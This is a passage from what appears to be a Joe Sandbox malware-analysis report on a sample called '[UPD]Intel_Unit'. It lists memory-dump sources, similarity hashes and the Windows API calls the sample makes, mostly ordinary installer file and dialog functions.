                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                              • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                              • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                              • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                              • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4115351271-0
                                                                                                                                                                                                              • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                              • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                              • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                              • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                              • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                                              • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                              • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                              • String ID: $ @$M$N
                                                                                                                                                                                                              • API String ID: 1638840714-3479655940
                                                                                                                                                                                                              • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                              • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                              • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                                              • API String ID: 3347642858-1086125096
                                                                                                                                                                                                              • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                              • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
